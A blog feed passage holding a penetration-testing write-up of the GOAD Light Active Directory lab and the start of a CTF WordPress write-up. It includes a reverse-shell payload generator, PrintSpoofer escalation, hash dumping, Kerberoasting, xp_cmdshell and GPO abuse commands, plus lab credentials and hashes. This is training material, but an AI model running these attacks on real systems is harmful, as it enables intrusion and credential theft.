SEVENKINGDOMS | NetBIOS_Computer_Name: KINGSLANDING | DNS_Domain_Name: sevenkingdoms.local | DNS_Computer_Name: kingslanding.sevenkingdoms.local | Product_Version: 10.0.17763 |_ System_Time: 2024-11-07T16:28:09+00:00 |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Issuer: commonName=kingslanding.sevenkingdoms.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-06T09:02:59 | Not valid after: 2025-05-08T09:02:59 | MD5: d9ec:f182:4515:44a8:0935:5d95:3c86:dd98 |_SHA-1: 00ad:2903:56a1:7c6a:b16c:bd2d:a7c0:c6fb:4edb:e2e9 Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) | Names: | KINGSLANDING\u0026lt;00\u0026gt; Flags: \u0026lt;unique\u0026gt;\u0026lt;active\u0026gt; | SEVENKINGDOMS\u0026lt;00\u0026gt; Flags: \u0026lt;group\u0026gt;\u0026lt;active\u0026gt; | SEVENKINGDOMS\u0026lt;1c\u0026gt; Flags: \u0026lt;group\u0026gt;\u0026lt;active\u0026gt; |_ KINGSLANDING\u0026lt;20\u0026gt; Flags: \u0026lt;unique\u0026gt;\u0026lt;active\u0026gt; | smb2-time: | date: 2024-11-07T16:28:09 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: -1s, deviation: 0s, median: -1s 192.168.0.151\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:30:04Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2024-11-07T11:44:09 |_Not valid after: 2025-11-07T11:44:09 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2024-11-07T11:44:09 |_Not valid after: 2025-11-07T11:44:09 |_ssl-date: 2024-11-07T16:30:52+00:00; -1s from scanner time. 3389/tcp open ms-wbt-server? |_ssl-date: 2024-11-07T16:30:53+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: NORTH | NetBIOS_Domain_Name: NORTH | NetBIOS_Computer_Name: WINTERFELL | DNS_Domain_Name: north.sevenkingdoms.local | DNS_Computer_Name: winterfell.north.sevenkingdoms.local | Product_Version: 10.0.17763 |_ System_Time: 2024-11-07T16:30:48+00:00 | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Not valid before: 2024-11-06T09:17:34 |_Not valid after: 2025-05-08T09:17:34 Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: WINTERFELL, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) | smb2-time: | date: 2024-11-07T16:30:47 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required 192.168.0.152\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Site doesn\u0026#39;t have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-ntlm-info: | 192.168.0.152:1433: | Target_Name: NORTH | NetBIOS_Domain_Name: NORTH | NetBIOS_Computer_Name: CASTELBLACK | DNS_Domain_Name: north.sevenkingdoms.local | DNS_Computer_Name: castelblack.north.sevenkingdoms.local | DNS_Tree_Name: sevenkingdoms.local |_ Product_Version: 10.0.17763 | ms-sql-info: | 192.168.0.152:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 |_ssl-date: 2024-11-08T06:28:57+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-11-08T06:28:14 |_Not valid after: 2054-11-08T06:28:14 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: NORTH | NetBIOS_Domain_Name: NORTH | NetBIOS_Computer_Name: CASTELBLACK | DNS_Domain_Name: north.sevenkingdoms.local | DNS_Computer_Name: castelblack.north.sevenkingdoms.local | DNS_Tree_Name: sevenkingdoms.local | Product_Version: 10.0.17763 |_ System_Time: 2024-11-07T17:15:22+00:00 |_ssl-date: 2024-11-07T17:15:27+00:00; -2s from scanner time. | ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local | Not valid before: 2024-11-06T09:32:35 |_Not valid after: 2025-05-08T09:32:35 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -1s, deviation: 0s, median: -1s |_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-11-07T17:15:22 |_ start_date: N/A domains - sevenkingdoms.local north.sevenkingdoms.local\n192.168.0.150 - kingslanding.sevenkingdoms.local sevenkingdoms.local\n192.168.0.151 - winterfell.north.sevenkingdoms.local north.sevenkingdoms.local\n192.168.0.152 - castelblack.north.sevenkingdoms.local\nweb server there is a webpage that allows file upload , there are no filters so i upload a .aspx reverse shell payload\nwe get a shell\nThe current user \u0026ldquo;iis apppool\\defaultapppool\u0026rdquo; has the following priviledges SeImpersonatePrivilege\nThis can be exploited using prinspoofer \u0026raquo; here\n1 .\\printspoofer.exe -i -c cmd We are now the user \u0026ldquo;nt authority\\system\u0026rdquo;\nFrom here we can extract the sam.hive and system.hive since we have the full control on the system.\n1 2 3 4 5 6 reg save hklm\\sam .\\sam.hive reg save hklm\\system .\\system.hive From these we can get the Administrator ntlm hash that we can use to login\n1 2 3 4 5 6 7 8 9 10 11 12 impacket-secretsdump -sam sam.hive -system system.hive LOCAL [*] Target system bootKey: 0xe58fc6e5f506631517c563ede86bead7 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4363b6dc0c95588964884d7e1dfea1f7::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Cleaning up... We can successfully login via winrm in winterfell.north.sevenkingdoms.local and castleblack.north.sevenkingdoms.local as user Administrator\nThis is an easy way to pwn both machines , ill try to find another way in.\nEnumerate users 1 enum4linux -U 192.168.0.150 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Administrator Guest arya.stark brandon.stark catelyn.stark eddard.stark hodor jeor.mormont jon.snow krbtgt rickon.stark robb.stark samwell.tarly \u0026gt;\u0026gt;\u0026gt; Heartsbane sansa.stark sql_svc vagrant we get one password in the users description\nwe can enumerate users while using the creds to discover more\nWe test for password reuse and to check what services we can access with the creds\n1 crackmapexec winrm -u users.txt -p pass.txt -d north.sevenkingdoms.local 192.168.0.152 --continue-on-success ASREProasting 1 2 3 4 5 6 7 8 9 impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt [-] User sansa.stark doesn\u0026#39;t have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:f080ed05bd30304fa0bea81ca05405f6$ca17da3a99435d0bf66642dfe2ada0c9febfb7184b6443b2c023e67198024d298c66105c63f033e98ebdb6162aff103f2f7a79cf367f4b1cea1a70e3a2b695c5a39d02b5b4b87e90dfce2622072ea26b070feef5d313878872ebf79559df740409413228019091a3bf3aee425795bbdddfc2d8aa80f3c209339b29e5a1ad0d74b0230c8028ef1c778f7b43ab3a34e9d37f680506a82e8b552d0da1e53f8105bb6ba92bf3bc204685e86838b8fa12bc8365076df3022725ef90ef43ed3455f6e516477410d24689b4a557b24be888e54ef783ccdf0428f018a51e000e653a8f90a1aebc8929bdb95d897671c4e53538b5f420daba510dee349dc4b9f85cf40d3a3b5e2603bc6e $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:11e9b0e6b849834048f19d77ffaab958$3218a7897d46cd4c6cc28ab77e3ff8893f0e530446cbb02a28fcf80b8b3a83696826fa6db255a97cd634a41049f2d72240b2a3bde89dfdc3e7e40d7057fbe83d51b7bb87487fe89625c5a9f99b97130b4c69c7e9f0518869044366a7abfb6df8e0044a3f21c2f025ba58e56476c18b6ea944aadde9790d1d38a4590f052967e3262962998cabce6ecdba1e30e5e1cd77b303b18cac80d1bfa06f04bf9d5e830bd9140817a985b4fc16288556cb954920a2fedbaf245d2750bf32552026a53685766029c3c6d5a1219a3a6a126fdf64b55c4648621f8a88846c6be559c195df989f78b2b10cb2a2200a70c1e87eb6175992aafb3bc281d0b85da89ce461dc08d1a69c112573d5 We can try to crack the hashes with hashcat\n1 2 hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt we get \u0026ldquo;brandon.stark : iseedeadpeople\u0026rdquo;\nKERBEroasting 1 2 3 4 5 impacket-GetUserSPNs -dc-ip 192.168.0.151 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -request $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$1d34574ce34accafda00ef02b9da270f$16e9888818297ed29f8a91374159c93fcf29790fc0aabb9efa7038fde3cf37aa9724f1b0c8e05a4ce8d0cc19dd362666c78a1cfd643305c3b4b62361ff6675b46d6ddc10515a0a5a39c4b4d19c1c9c2642efeea3ab97724cdb57cf7ba885cc3bf5fe417fad67122be19b4adb8ee9ed27d55fdd117de355b1e8745e1b817cd650671c6a81e7f4803a95321811ed14167a2b798d37d2b7ae035d1df2b4ce2e030c90ad91f26c61925704acf3144f4717eb313e58ccaa665330fa705685aa2c053dba4b1f5fa1df384b9bd4720b3c94813cdec25e0506ec1b254ebf9eec7973420d1cf81f98408fc1a890c04e0712b3ea29bea9129457b4c9f6754f486972b05bdfea081be903e7b9ce0a3170829759643f288e31e0482f265585692c1ba6eceda0e3c4a07ecd1ea9e3423ba489b429390aa002e35027cd7b23552758b754a3138760281f1f9c68ed389f11c2fd891e7d4d7949f02924f76789c90df7fb096760768486a7c7100f487477818ed6c887af5eee13a5f71742ea4f866c3675b0a18197e2908644e39a05803970cc5ba1943006609e130e3185a658fcac6f8a589b8abd495a7e35f5b94256933c1467e7accc87f2bb83f1b8002a3dc6f97fb13f1b724eca06e0438597733aa0fef9cd71e736f02290a04e33bc5e1916043d3e2aeadd4712ce5671e605c29eaef21c7f6a80ae1e8fc260fb75f4fc21fc6a1896cf8ebcdd221cc6d9a30b7fd15f7866276320437765dfcda8be683e23be0af007a1490361a03d9cda1b45791a0feecac98db7e591eb61f09dd5b32a5953736987b10311e1f21a8a734e950859d4af97cbd71c354b285050291979f5134c1aaa2675dbe72bb25b59e3a17351a2444e2ac92f160043dfad2a3a2f306aca871ec0b96488ee8a9ef4a61c0bce6e67319791427fac89be54a294db5025fcb2cd496673ac6aadd9a6c62d403d925de0541482a77046c0e2b01e94f5b6873ff4389159a693c9daaf87d5fc8ae0bc270fafedd57a4f2a1eba4d09f51bce273b35915168b845da58d1539527076d43018d4da5fd00f0614ea005cb87563a5be8bbf3b7dfd9cd367b78fb3caae1fb5c0b33aeef66b00e4f4180688858c55a215e45bd35b703531a22c8b6c167fba4b64d8641c0fe5d92a1ed8b9ce7152dd49fbbf9702bcd9c5413f33e339854b0d40980ed340c0da2c7bf70763076d6eef8e1b2fe04867a7f413506792037593087582fe71944241573b66af339eaa1b6e4834b7fcb0493c527a8e5aa9939b0be1dfcb18c1d4d4f7e3cfdbb4536c13959205305817dd9e024d60d75377027c96365a739b3f08567f755881002d416eba6979d857acf95ebe715c50a0fb3e9760c8a86f9c27cdd203f8b38fd41cc51727914d6cf551a6a585c002115a36f0faebf8c9626c4c2fd07dc2ddd61e9ed1649ac05531c1acc0a719b55e1bb138fdd19e95ce2fd6598bf5fadc3f8c11aa5de8a7603a0c9d3436d84851fc501a75c1906f29e11a61e6f6c07b6d7bc01 $krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$84792126b6065b19368a23f2d3f946f0$261a5265d61be8c8f584a9a1c2c64e61601d81421669de0bdcf1ded1a12cdd258414965992eff28bce23b5ba37b187a3e703cb308ce4d3dc053e5fa6a32a35efbe39e39b1e5a6716613fc54c84aaf533e491f306026ffdcb37585b377a4dfa0b8f43bede9baec2cbda0a35f608af18f0c310e2011c79df83861d136a895dbf79dcd60a8f60a0e621cb38d12659856ea8175c5f25a1c6a3fbf416576e7f78827ce04df3ccda4dd720d28b9142ec97ff2d4cdf8a90bb71c139e9b379ec83a4f06b1061850b51b5a3b5945dda4b7ecc8d0b496ec218a763529aa677ff87faac058f4734351a4e8b4101e5e42f014969696bb0f94f619e8a82e8ce52f0b83f67a9aebb317cc377415210eee3f7c8557c29c5d93430e4d38b8f16f9b392476e4e82eb7c8118a5af99c52e6b97982dc131bd67d3fb1a0bbb910b50bde9071ea6e2200d926b209a0edae9ec922d9ec72b359aaaa3939f8442759cc247e4b23e824909897f12f560213a458b8fd635fdc48fdaef5c87f75342582719c87c24e1d479d4c1bc1e5860c38982a828f10af5afe728daf78c41b80b9e8d23b218d84010a052f4815ae48737d754d7c2662dfc9250587795bd417fbe3ee7406fd485103bea60c0d3162241b73affb286fb75e6479b1c9a564fad284622ab917068f0715e3521aa3b971f533e52d298377ac1f0284681367c75cafe05407fbe378afebb50df4be14378ff3131b93c8b33e8fb34420e6e166edd507abd729826e3fee1d5d882c983e6a4c3400698dbe15a3f0722a6bca18687e06710d6ff53578881a524a6b9e12ad25ac8376a75351cc4301e4379d5ee9f196550df0aa47fbe3c09890cfd84c48182c63a411d1c2a3c480c09d2c624d0ac3679cc2aa2c7eb7b8755c585b6075e4c77be5ac8a9338904098b3bdcb79fd7fab1f6cee55641bf6e113790951528b78821e508d07a59c0f1da04e944048f5c346a75ebd9899d7fc9da096a75587a103b2a95a50ada643044d8107859024bec2215107df01ed17cecef2c5e2573c625d45ddef49f4128f22d63ebddd7beb815ef6db2c64999b74fa800a39886c844a8955052e59c7708bd6aa1fb4a2ee874c7fb644cfa7f782b479c71b4cb89a8452629444a6a0522d2d82401a6e722b06aa067eaf6f002c3b2bf0a41ffbb2419fc4454f5d6f17e9888fd597428452a02ad795872cad2389e54b541a9d200759dd6cab82456da66aab93d62a8c3b4761c7e72684a294a37b1ae2a4ff81de17d686893c74a1eb786d4dcd3b3b91e8aea09e66d8ff3d70cea1f10ea19eaa5968798f52336c0d76357c8844914656aa720b6cc0bcc52049b6befa4d9de59f7de764dea1c52814f55737efd49625126adf6075289221d9869ca7165fbf6bef70318c18fb5f46dd722c9bcb019a690462cf369fc1eb1e97dda1a7e172f83f0c44064e4f4d03184e265216647750f50926d396f1a67820b2c2c8221e72ba49bd8612cf3cabdccee89f2cfdb467a7615a96681ab1b7b we get password \u0026ldquo;jon.snow : iknownothing\u0026rdquo;\nThis user can login via RDP on winterfell and MQSQL on castleblack\n1 2 3 4 5 crackmapexec mssql castleblack.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local MSSQL castleblack 1433 None [*] None (name:castleblack.north.sevenkingdoms.local) (domain:north.sevenkingdoms.local) MSSQL castleblack 1433 None [+] north.sevenkingdoms.local\\jon.snow:iknownothing (Pwn3d!) MSSQL 1 2 impacket-mssqlclient -windows-auth north.sevenkingdoms.local/jon.snow:iknownothing@192.168.0.152 Checking impersonation abilities\n1 2 3 4 5 6 7 8 9 10 11 execute as database permission_name state_desc grantee grantor ---------- -------- --------------- ---------- ------------------- ---------------------------- b\u0026#39;USER\u0026#39; master IMPERSONATE GRANT NORTH\\arya.stark dbo b\u0026#39;USER\u0026#39; msdb IMPERSONATE GRANT NORTH\\arya.stark dbo b\u0026#39;USER\u0026#39; msdb IMPERSONATE GRANT dc_admin MS_DataCollectorInternalUser b\u0026#39;LOGIN\u0026#39; b\u0026#39;\u0026#39; IMPERSONATE GRANT NORTH\\samwell.tarly sa b\u0026#39;LOGIN\u0026#39; b\u0026#39;\u0026#39; IMPERSONATE GRANT NORTH\\brandon.stark NORTH\\jon.snow A “Login” grants the principal entry into the SERVER A “User” grants a login entry into a single DATABASE User \u0026ldquo;samwell.tarly\u0026rdquo; can impersonate login of \u0026ldquo;sa\u0026rdquo;, so we have to login to mssql as samwell first and then run.\n1 2 3 4 exec_as_login sa enable_xp_cmdshell xp_cmdshell whoami from here we can get a reverse shell as user sql_svc\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 #!/usr/bin/env python import base64 import sys if len(sys.argv) \u0026lt; 3: print(\u0026#39;usage : %s ip port\u0026#39; % sys.argv[0]) sys.exit(0) payload=\u0026#34;\u0026#34;\u0026#34; $c = New-Object System.Net.Sockets.TCPClient(\u0026#39;%s\u0026#39;,%s); $s = $c.GetStream();[byte[]]$b = 0..65535|%%{0}; while(($i = $s.Read($b, 0, $b.Length)) -ne 0){ $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i); $sb = (iex $d 2\u0026gt;\u0026amp;1 | Out-String ); $sb = ([text.encoding]::ASCII).GetBytes($sb + \u0026#39;ps\u0026gt; \u0026#39;); $s.Write($sb,0,$sb.Length); $s.Flush() }; $c.Close() \u0026#34;\u0026#34;\u0026#34; % (sys.argv[1], sys.argv[2]) byte = payload.encode(\u0026#39;utf-16-le\u0026#39;) b64 = base64.b64encode(byte) print(\u0026#34;powershell -exec bypass -enc %s\u0026#34; % b64.decode()) Bloodhound 1 bloodhound-python -u brandon.stark -p iseedeadpeople -d north.sevenkingdoms.local -c all -dc winterfell.north.sevenkingdoms.local -ns 192.168.0.151 Here we can mark the high value targets and the users that we have compromised. Bloodhound is useful to get a visual representation of the active directory environment.\nPrivilege escalation We can modify the GPO \u0026quot;\u0026quot; as user samwell.tarly\nHere we willl utilize a tool pygpoabuse\nWe need to get the gpoid , this can be done by loggin in via rdp as jon.snow and running\n1 Get-GPO -All -Domain \u0026#39;north.sevenkingdoms.local\u0026#39; Then\u0026hellip;\n1 2 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly -gpo-id 848cf9d5-81b3-49d6-b628-d8fbcc1a322c This creates an admin user called \u0026ldquo;john\u0026rdquo; with the password \u0026ldquo;H4x00r123..\u0026rdquo;\nWe can now login via winrm\n1 2 3 4 SMB 192.168.0.151 5986 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) HTTP 192.168.0.151 5986 WINTERFELL [*] https://192.168.0.151:5986/wsman WINRM 192.168.0.151 5986 WINTERFELL [+] north.sevenkingdoms.local\\john:H4x00r123.. (Pwn3d!) Using crackmap exec smb and the new user\n1 crackmapexec smb 192.168.0.151 -u john -p \u0026#34;H4x00r123..\u0026#34; --lsa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 B 192.168.0.151 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.0.151 445 WINTERFELL [+] north.sevenkingdoms.local\\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) SMB 192.168.0.151 445 WINTERFELL [+] Dumping LSA secrets SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:aes256-cts-hmac-sha1-96:9b9cfb7bc4b4696ac33184f5aef050c90c18bf5c5bbdc9dadbe0e538d401e205 SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:aes128-cts-hmac-sha1-96:939fc4f35f4894dca4328d7a1788b7ee SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:des-cbc-md5:1680497f851ad66d SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:plain_password_hex:81ba3b085654dc44a1ede7ea006e2330b869f885bb76d6ab9b9bf959a24835a4521407345d840c9e3708abbd8730822260734914769732e031d0fd7c3a3c71438b3da91460cde8ee884c8de619df6c8bf88c7040e1af0b552dd4aa01a9b1ba5cda63d6a11d54d7044f5a14bdd3263812850cb5184a3456c27ef083e7da3fd1143d814beeaa3adabc0a81e53eb0606dc151421cb756eed4c52a108f22f160d18e761642e1f66effc5fdb5ba3e01720c527d05cd1a24a7b8557579980b5757862c82168b0abbbc89aec55414e741e6252a03acd29acea1ae9b5fb933f2fb6ca9e838e0395cb84e19a10b3ffcd3e3409c92 SMB 192.168.0.151 445 WINTERFELL NORTH\\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: SMB 192.168.0.151 445 WINTERFELL NORTH\\robb.stark:sexywolfy SMB 192.168.0.151 445 WINTERFELL dpapi_machinekey:0x2156559686eeb6fd6e9116a6dbb58d11e61c87b4 dpapi_userkey:0x802f741bb0b27e5f5fef3b7bc549bac02f4fa528 SMB 192.168.0.151 445 WINTERFELL NL$KM:223401760170309388a76bb2874359690e41bd220a0ccc233a5bb674cb90d63514cad8454af0db72d5cf3ba1ed7f3a98cd4dd6366a35242da0eb0f8e3f5281c9 SMB 192.168.0.151 445 WINTERFELL [+] Dumped 8 LSA secrets to /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.secrets and /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_120932.cached 1 crackmapexec smb 192.168.0.151 -u john -p \u0026#34;H4x00r123..\u0026#34; --ntds 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 SMB 192.168.0.151 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.0.151 445 WINTERFELL [+] north.sevenkingdoms.local\\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) SMB 192.168.0.151 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.0.151 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e1aa23cbaaed62c05427ff7148c04d8::: SMB 192.168.0.151 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: SMB 192.168.0.151 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709::: SMB 192.168.0.151 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8::: SMB 192.168.0.151 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5::: SMB 192.168.0.151 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a::: SMB 192.168.0.151 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:2c643546d00054420505a2bf86d77c47::: SMB 192.168.0.151 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129::: SMB 192.168.0.151 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560::: SMB 192.168.0.151 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e::: SMB 192.168.0.151 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755::: SMB 192.168.0.151 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843::: SMB 192.168.0.151 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664::: SMB 192.168.0.151 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: SMB 192.168.0.151 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:9d473a58231037f6c63b9c7f0d50c61f::: SMB 192.168.0.151 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:1540ceefdcd5c9e64384ea6796bcd3b4::: SMB 192.168.0.151 445 WINTERFELL krbrelay$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83::: SMB 192.168.0.151 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:02f4f0cba0ec04eae62a64df80330594::: SMB 192.168.0.151 445 WINTERFELL [+] Dumped 20 NTDS hashes to /home/kali/.cme/logs/WINTERFELL_192.168.0.151_2024-11-08_121039.ntds of which 16 were added to the database 1 crackmapexec smb 192.168.0.151 -u john -p \u0026#34;H4x00r123..\u0026#34; --sam 1 2 3 4 5 6 7 8 TERFELL [+] north.sevenkingdoms.local\\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) SMB 192.168.0.151 445 WINTERFELL [+] Dumping SAM hashes SMB 192.168.0.151 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: SMB 192.168.0.151 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.0.151 445 WINTERFELL DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn\u0026#39;t have hash information. SMB 192.168.0.151 445 WINTERFELL [+] Added 3 SAM hashes to the database We also get another plaintext creds \u0026lsquo;NORTH\\robb.stark:sexywolfy\u0026rsquo;\nChecking this use on Bloodhound we can see that there is a path to domain admin.\nTHe user has generic all , so we can add ourselves to domain admin group\n1 2 net group \u0026#34;Domain Admins\u0026#34; john /add /domain From here we can login to the domain controller\nAnd we pwn the north :)\n","date":"2024-11-08T14:33:30+03:00","permalink":"https://f0rk3b0mb.github.io/p/goad-light/","title":"GOAD LIGHT"},{"content":"Bsides Nairobi Cyberchallenge 2024 writeup This is a writeup for the web challenges in Bsides Nairobi Cyberchallenge held physically at Strathmore university, Nairobi\nMy team p3rf3ctr00t won , for the second year in a row. :)\nWeb category Mr donor Here we are given a wordpress site. With donation forms.\nSo first things first, i use wpscan to enumerate the site. There isint alot of content.\n1 2 3 4 use this to enumerate the users wpscan --url http://3.85.212.227/ -e u we get one user - admin_magharibi\nFrom the scan we can also see that there is a plugin called \u0026ldquo;give\u0026rdquo; version 3.41.0\nLooking on the internet we can see that it is vulnerable to CVE-2024-5932 so we can achieve code execution.\nI used this exploit \u0026raquo; here\nIn the shell we can see that there are 3 users\nbackup_svc ctfroom ubuntu checking the contents of wp-config.php\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 /** Database username */ define( \u0026#39;DB_USER\u0026#39;, \u0026#39;wordpressuser\u0026#39; ); /** Database password */ define( \u0026#39;DB_PASSWORD\u0026#39;, \u0026#39;roomctfpassword\u0026#39; ); /** Database hostname */ define( 